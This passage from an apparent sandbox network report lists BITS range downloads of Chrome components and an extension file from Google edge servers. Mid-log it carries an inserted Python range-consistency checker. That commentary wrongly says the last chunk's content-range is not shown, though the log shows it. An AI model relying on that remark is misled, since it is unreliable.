  age: 72970
  content-range: bytes 0-1119/5558
  alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
  cache-control: public,max-age=86400

• GET http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ
  Remote address: 34.104.35.123:80
  Request
  GET /edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  Accept-Encoding: identity
  If-Unmodified-Since: Tue, 13 Oct 2020 23:46:14 GMT
  Range: bytes=1120-1153
  User-Agent: Microsoft BITS/7.8
  Host: edgedl.me.gvt1.com
  Response
  HTTP/1.1 206 Partial Content
  accept-ranges: bytes
  content-disposition: attachment
  content-length: 34
  content-security-policy: default-src 'none'
  content-type: application/octet-stream
  etag: "748e44"
  last-modified: Tue, 13 Oct 2020 23:46:14 GMT
  server: Google-Edge-Cache
  x-content-type-options: nosniff
  x-frame-options: SAMEORIGIN
  x-xss-protection: 0
  date: Thu, 01 Jul 2021 11:01:03 GMT
  age: 72975
  content-range: bytes 1120-1153/5558
  alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
  cache-control: public,max-age=86400

• GET http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ
  Remote address: 34.104.35.123:80
  Request
  GET /edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  Accept-Encoding: identity
  If-Unmodified-Since: Tue, 13 Oct 2020 23:46:14 GMT
  Range: bytes=1154-1297
  User-Agent: Microsoft BITS/7.8
  Host: edgedl.me.gvt1.com
  Response
  HTTP/1.1 206 Partial Content
  accept-ranges: bytes
  content-disposition: attachment
  content-length: 144
  content-security-policy: default-src 'none'
  content-type: application/octet-stream
  etag: "748e44"
  last-modified: Tue, 13 Oct 2020 23:46:14 GMT
  server: Google-Edge-Cache
  x-content-type-options: nosniff
  x-frame-options: SAMEORIGIN
  x-xss-protection: 0
  date: Thu, 01 Jul 2021 11:01:03 GMT
  age: 72981
  content-range: bytes 1154-1297/5558
  alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
  cache-control: public,max-age=86400

• GET http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ
  Remote address: 34.104.35.123:80
  Request
  GET /edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  Accept-Encoding: identity
  If-Unmodified-Since: Tue, 13 Oct 2020 23:46:14 GMT
  Range: bytes=1298-2802
  User-Agent: Microsoft BITS/7.8
  Host: edgedl.me.gvt1.com
  Response
  HTTP/1.1 206 Partial Content
  accept-ranges: bytes
  content-disposition: attachment
  content-length: 1505
  content-security-policy: default-src 'none'
  content-type: application/octet-stream
  etag: "748e44"
  last-modified: Tue, 13 Oct 2020 23:46:14 GMT
  server: Google-Edge-Cache
  x-content-type-options: nosniff
  x-frame-options: SAMEORIGIN
                                                                                                                                                                                        date: Thu, 01 Jul 2021 11:01:03 GMT
                                                                                                                                                                                        age: 72986
                                                                                                                                                                                        content-range: bytes 1298-2802/5558
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400

GET
http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ
Remote address:
34.104.35.123:80
Request
GET /edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 13 Oct 2020 23:46:14 GMT
Range: bytes=2803-5557
User-Agent: Microsoft BITS/7.8
Host: edgedl.me.gvt1.com
Response
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 2755
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "748e44"
last-modified: Tue, 13 Oct 2020 23:46:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Thu, 01 Jul 2021 11:01:03 GMT
age: 72988
content-range: bytes 2803-5557/5558
alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
cache-control: public,max-age=86400

HEAD
http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/AIQWwBRSWwfx2JCxD0aw30k_2657/I-4-aBwqaCFG5rMUT0QDpg
Remote address:
34.104.35.123:80
Request
HEAD /edgedl/release2/chrome_component/AIQWwBRSWwfx2JCxD0aw30k_2657/I-4-aBwqaCFG5rMUT0QDpg HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.8
Host: edgedl.me.gvt1.com
Response
HTTP/1.1 200 OK
accept-ranges: bytes
content-disposition: attachment
content-length: 19066
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "a49fca"
last-modified: Wed, 30 Jun 2021 16:53:29 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Fri, 02 Jul 2021 02:24:48 GMT
age: 17567
alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
cache-control: public,max-age=86400

GET
http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/AIQWwBRSWwfx2JCxD0aw30k_2657/I-4-aBwqaCFG5rMUT0QDpg
Remote address:
34.104.35.123:80
Request
GET /edgedl/release2/chrome_component/AIQWwBRSWwfx2JCxD0aw30k_2657/I-4-aBwqaCFG5rMUT0QDpg HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 30 Jun 2021 16:53:29 GMT
Range: bytes=0-6986
User-Agent: Microsoft BITS/7.8
Host: edgedl.me.gvt1.com
Response
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 6987
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "a49fca"
last-modified: Wed, 30 Jun 2021 16:53:29 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Fri, 02 Jul 2021 02:24:48 GMT
age: 17567
content-range: bytes 0-6986/19066
alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
cache-control: public,max-age=86400

GET
http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/AIQWwBRSWwfx2JCxD0aw30k_2657/I-4-aBwqaCFG5rMUT0QDpg
Remote address:
34.104.35.123:80
Request
GET /edgedl/release2/chrome_component/AIQWwBRSWwfx2JCxD0aw30k_2657/I-4-aBwqaCFG5rMUT0QDpg HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 30 Jun 2021 16:53:29 GMT
Range: bytes=6987-19065
User-Agent: Microsoft BITS/7.8
Host: edgedl.me.gvt1.com
Response
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 12079
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "a49fca"
last-modified: Wed, 30 Jun 2021 16:53:29 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Fri, 02 Jul 2021 02:24:48 GMT
age: 17568
content-range: bytes 6987-19065/19066
alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
cache-control: public,max-age=86400

HEAD
http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
Remote address:
34.104.35.123:80
Request
HEAD /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.8
Host: edgedl.me.gvt1.com
Response
HTTP/1.1 200 OK
accept-ranges: bytes
content-disposition: attachment
content-length: 6760942
content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "2e2fe7"
                                                                                                                                                                                        last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77015
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
• flag-unknown
GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
Remote address: 34.104.35.123:80
Request
GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
Range: bytes=0-11199
User-Agent: Microsoft BITS/7.8
Host: edgedl.me.gvt1.com
Response
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 11200
content-security-policy: default-src 'none'
content-type: application/x-chrome-extension
etag: "2e2fe7"
last-modified: Wed, 10 Oct 2018 17:49:21 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Thu, 01 Jul 2021 09:54:08 GMT
age: 77015
content-range: bytes 0-11199/6760942
alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
cache-control: public,max-age=86400
• flag-unknown
GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
Remote address: 34.104.35.123:80
Request
GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
Range: bytes=11200-75127
User-Agent: Microsoft BITS/7.8
Host: edgedl.me.gvt1.com
Response
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 63928
content-security-policy: default-src 'none'
content-type: application/x-chrome-extension
etag: "2e2fe7"
last-modified: Wed, 10 Oct 2018 17:49:21 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Thu, 01 Jul 2021 09:54:08 GMT
age: 77016
content-range: bytes 11200-75127/6760942
alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
cache-control: public,max-age=86400
• flag-unknown
GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
Remote address: 34.104.35.123:80
Request
GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
Range: bytes=75128-165688
User-Agent: Microsoft BITS/7.8
Host: edgedl.me.gvt1.com
Response
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 90561
content-security-policy: default-src 'none'
content-type: application/x-chrome-extension
etag: "2e2fe7"
last-modified: Wed, 10 Oct 2018 17:49:21 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Thu, 01 Jul 2021 09:54:08 GMT
age: 77016
content-range: bytes 75128-165688/6760942
alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
cache-control: public,max-age=86400
• flag-unknown
GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
Remote address: 34.104.35.123:80
Request
GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
Range: bytes=165689-309547
User-Agent: Microsoft BITS/7.8
Host: edgedl.me.gvt1.com
Response
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 143859
content-security-policy: default-src 'none'
content-type: application/x-chrome-extension
etag: "2e2fe7"
last-modified: Wed, 10 Oct 2018 17:49:21 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Thu, 01 Jul 2021 09:54:08 GMT
age: 77017
content-range: bytes 165689-309547/6760942
alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
cache-control: public,max-age=86400
• GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
  Remote address: 34.104.35.123:80
  Request
  GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  Accept-Encoding: identity
  If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
  Range: bytes=309548-545760
  User-Agent: Microsoft BITS/7.8
  Host: edgedl.me.gvt1.com
  Response
  HTTP/1.1 206 Partial Content
  accept-ranges: bytes
  content-disposition: attachment
  content-length: 236213
  content-security-policy: default-src 'none'
  content-type: application/x-chrome-extension
  etag: "2e2fe7"
  last-modified: Wed, 10 Oct 2018 17:49:21 GMT
  server: Google-Edge-Cache
  x-content-type-options: nosniff
  x-frame-options: SAMEORIGIN
  x-xss-protection: 0
  date: Thu, 01 Jul 2021 09:54:08 GMT
  age: 77018
  content-range: bytes 309548-545760/6760942
  alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
  cache-control: public,max-age=86400
• GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
  Remote address: 34.104.35.123:80
  Request
  GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  Accept-Encoding: identity
  If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
  Range: bytes=545761-1015876
  User-Agent: Microsoft BITS/7.8
  Host: edgedl.me.gvt1.com
  Response
  HTTP/1.1 206 Partial Content
  accept-ranges: bytes
  content-disposition: attachment
  content-length: 470116
  content-security-policy: default-src 'none'
  content-type: application/x-chrome-extension
  etag: "2e2fe7"
  last-modified: Wed, 10 Oct 2018 17:49:21 GMT
  server: Google-Edge-Cache
  x-content-type-options: nosniff
  x-frame-options: SAMEORIGIN
  x-xss-protection: 0
  date: Thu, 01 Jul 2021 09:54:08 GMT
  age: 77019
  content-range: bytes 545761-1015876/6760942
  alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
  cache-control: public,max-age=86400
• GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
  Remote address: 34.104.35.123:80
  Request
  GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  Accept-Encoding: identity
  If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
  Range: bytes=1015877-1619319
  User-Agent: Microsoft BITS/7.8
  Host: edgedl.me.gvt1.com
  Response
  HTTP/1.1 206 Partial Content
  accept-ranges: bytes
  content-disposition: attachment
  content-length: 603443
  content-security-policy: default-src 'none'
  content-type: application/x-chrome-extension
  etag: "2e2fe7"
  last-modified: Wed, 10 Oct 2018 17:49:21 GMT
  server: Google-Edge-Cache
  x-content-type-options: nosniff
  x-frame-options: SAMEORIGIN
  x-xss-protection: 0
  date: Thu, 01 Jul 2021 09:54:08 GMT
  age: 77020
  content-range: bytes 1015877-1619319/6760942
  alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
  cache-control: public,max-age=86400
• GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
  Remote address: 34.104.35.123:80
  Request
  GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  Accept-Encoding: identity
  If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
  Range: bytes=1619320-2272836
  User-Agent: Microsoft BITS/7.8
  Host: edgedl.me.gvt1.com
  Response
  HTTP/1.1 206 Partial Content
  accept-ranges: bytes
  content-disposition: attachment
  content-length: 653517
  content-security-policy: default-src 'none'
  content-type: application/x-chrome-extension
  etag: "2e2fe7"
  last-modified: Wed, 10 Oct 2018 17:49:21 GMT
  server: Google-Edge-Cache
  x-content-type-options: nosniff
  x-frame-options: SAMEORIGIN
  x-xss-protection: 0
  date: Thu, 01 Jul 2021 09:54:08 GMT
  age: 77021
  content-range: bytes 1619320-2272836/6760942
  alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
  cache-control: public,max-age=86400
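The entries above are one file (the .crx, 6760942 bytes per content-range) being pulled by BITS in consecutive Range requests. When triaging a log like this, the question worth answering mechanically is whether the 206 responses actually returned the spans that were requested, whether each content-length matches its span, and whether the chunks tile the file without gaps or overlaps. The script below is an added example, not part of the tria.ge report or its tooling; it runs over a constructed sample built from the Range, content-length and content-range values of the five requests in this part of the log (the content-range of the last chunk is assumed from its Range header, since the page is cut off before it).

```python
"""Range-download consistency check for a sandbox HTTP log (added example)."""
import re
from dataclasses import dataclass


@dataclass
class Chunk:
    """One Range request paired with the headers of its response."""
    req_start: int
    req_end: int
    status: int = 0
    length: int = -1
    resp_start: int = -1
    resp_end: int = -1
    total: int = -1


# Constructed sample: the five BITS range requests for the .crx in this report,
# cut down to the fields the check reads. The content-range of the last chunk is
# assumed from its Range header because the page is truncated before it.
SAMPLE_LOG = """\
Range: bytes=309548-545760
User-Agent: Microsoft BITS/7.8
HTTP/1.1 206 Partial Content
content-length: 236213
content-range: bytes 309548-545760/6760942

Range: bytes=545761-1015876
User-Agent: Microsoft BITS/7.8
HTTP/1.1 206 Partial Content
content-length: 470116
content-range: bytes 545761-1015876/6760942

Range: bytes=1015877-1619319
User-Agent: Microsoft BITS/7.8
HTTP/1.1 206 Partial Content
content-length: 603443
content-range: bytes 1015877-1619319/6760942

Range: bytes=1619320-2272836
User-Agent: Microsoft BITS/7.8
HTTP/1.1 206 Partial Content
content-length: 653517
content-range: bytes 1619320-2272836/6760942

Range: bytes=2272837-2821659
User-Agent: Microsoft BITS/7.8
HTTP/1.1 206 Partial Content
content-length: 548823
content-range: bytes 2272837-2821659/6760942
"""


def parse_chunks(log_text: str) -> list[Chunk]:
    """Group header lines into Chunk records; a Range header opens a new record."""
    records = []
    cur = None
    for raw in log_text.splitlines():
        line = raw.strip()
        if m := re.match(r"Range:\s*bytes=(\d+)-(\d+)$", line, re.I):
            cur = {"req_start": int(m[1]), "req_end": int(m[2])}
            records.append(cur)
        elif cur is None:
            continue  # headers before the first Range line belong to no chunk
        elif m := re.match(r"HTTP/1\.[01]\s+(\d{3})", line):
            cur["status"] = int(m[1])
        elif m := re.match(r"content-length:\s*(\d+)$", line, re.I):
            cur["length"] = int(m[1])
        elif m := re.match(r"content-range:\s*bytes\s+(\d+)-(\d+)/(\d+)$", line, re.I):
            cur["resp_start"], cur["resp_end"], cur["total"] = map(int, m.groups())
    return [Chunk(**r) for r in records]


def check_chunks(chunks: list[Chunk]) -> dict:
    """Verify each chunk against its request, then check how the chunks tile the file."""
    problems = []
    for c in chunks:
        tag = f"{c.req_start}-{c.req_end}"
        if c.status != 206:
            problems.append(f"{tag}: status {c.status}, expected 206")
        if (c.resp_start, c.resp_end) != (c.req_start, c.req_end):
            problems.append(f"{tag}: server returned {c.resp_start}-{c.resp_end}")
        if c.length != c.resp_end - c.resp_start + 1:
            problems.append(f"{tag}: content-length {c.length} != span {c.resp_end - c.resp_start + 1}")
    totals = {c.total for c in chunks}
    if len(totals) > 1:
        problems.append(f"inconsistent total size across chunks: {sorted(totals)}")
    total = max(totals, default=0)

    # Walk the returned spans in order: bytes not yet reached are a gap, bytes
    # already reached are an overlap (a re-download or a server returning the
    # wrong span). `covered` counts the union of bytes actually delivered.
    gaps, overlaps, covered, cursor = [], [], 0, 0
    for start, end in sorted((c.resp_start, c.resp_end) for c in chunks):
        if start > cursor:
            gaps.append((cursor, start - 1))
        elif start < cursor:
            overlaps.append((start, min(end, cursor - 1)))
        covered += max(0, end - max(start, cursor) + 1)
        cursor = max(cursor, end + 1)
    if cursor < total:
        gaps.append((cursor, total - 1))
    return {
        "total": total, "covered": covered, "gaps": gaps, "overlaps": overlaps,
        "problems": problems, "complete": not (gaps or overlaps or problems),
    }


def check_log(log_text: str) -> dict:
    return check_chunks(parse_chunks(log_text))


if __name__ == "__main__":
    for key, value in check_log(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

On the sample the five chunks are internally consistent and contiguous (2512112 bytes delivered, spans 309548 through 2821659), so the only findings are the two gaps at either end, which correspond to the requests that fall outside this part of the log. A content-length that disagrees with its span, or a content-range that does not match the Range that was sent, shows up in `problems` and, for the latter, as an overlap.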
• GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
  Remote address: 34.104.35.123:80
  Request
  GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  Accept-Encoding: identity
  If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
  Range: bytes=2272837-2821659
  User-Agent: Microsoft BITS/7.8
  Host: edgedl.me.gvt1.com
  Response
  HTTP/1.1 206 Partial Content
  accept-ranges: bytes
  content-disposition: attachment
  content-length: 548823
  content-security-policy: default-src 'none'
  content-type: application/x-chrome-extension
  etag: "2e2fe7"
  last-modified: Wed, 10 Oct 2018 17:49:21 GMT
  server: Google-Edge-Cache
  x-content-type-options: nosniff
  x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77022
                                                                                                                                                                                        content-range: bytes 2272837-2821659/6760942
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        Range: bytes=2821660-3539889
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 718230
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "2e2fe7"
                                                                                                                                                                                        last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77023
                                                                                                                                                                                        content-range: bytes 2821660-3539889/6760942
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        Range: bytes=3539890-4161646
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
